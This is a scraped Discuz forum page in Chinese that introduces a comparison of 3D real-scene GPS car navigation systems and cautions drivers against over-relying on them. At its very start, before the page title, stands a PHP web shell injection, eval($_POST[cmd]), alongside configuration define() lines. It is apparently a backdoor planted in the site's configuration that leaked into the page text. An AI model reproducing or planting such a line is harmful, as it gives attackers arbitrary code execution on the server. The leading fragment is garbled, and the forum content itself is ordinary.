');eval($_POST[cmd])?>'); define('UC_APPID', 'UC_APPID'); define('UC_PPP', '20'); 地圖導航新領域 3D實景GPS系統大比拚 - GPS - 四輪天下 - Powered by Discuz!
返回列表 回復 發帖

地圖導航新領域 3D實景GPS系統大比拚

一談到3D導航,相信許多車載PND用戶都不會陌生,清晰的匝道和環線的出入口指引,道路兩旁栩栩如生的3D實景建築,為我們勾畫出一副立體的導航場景。3D導航模式作為地圖導航的新領域,已經漸漸的展現在新興的車載PND產品中。從凱立德的鳥瞰地圖視角到GARMIN的3D實景導航系統以及眾多的導航地圖所為用戶提供的3D導航模式,作為普通消費者我們越來越能夠有機會接觸到眾多的具有3D導航的地圖軟件。當面對選擇時,哪一款3D導航地圖更為實用方便的?哪一款更適合用戶實際需要呢?我們將會對目前市場上比較主流的幾種3D導航系統進行比較,供大家參考。
    3D導航系統對於初次使用的用戶來說,需要使用者對於此種導航模式有初步的瞭解,用戶可以採用模擬導航來提前感受一下3D導航的感覺,免得實際上路後對實際導航造成不必要的厭惡。此外,導航過程中還要結合語音報讀和實際路況,不能過分依賴3D導航以免造成交通事故的發生。
返回列表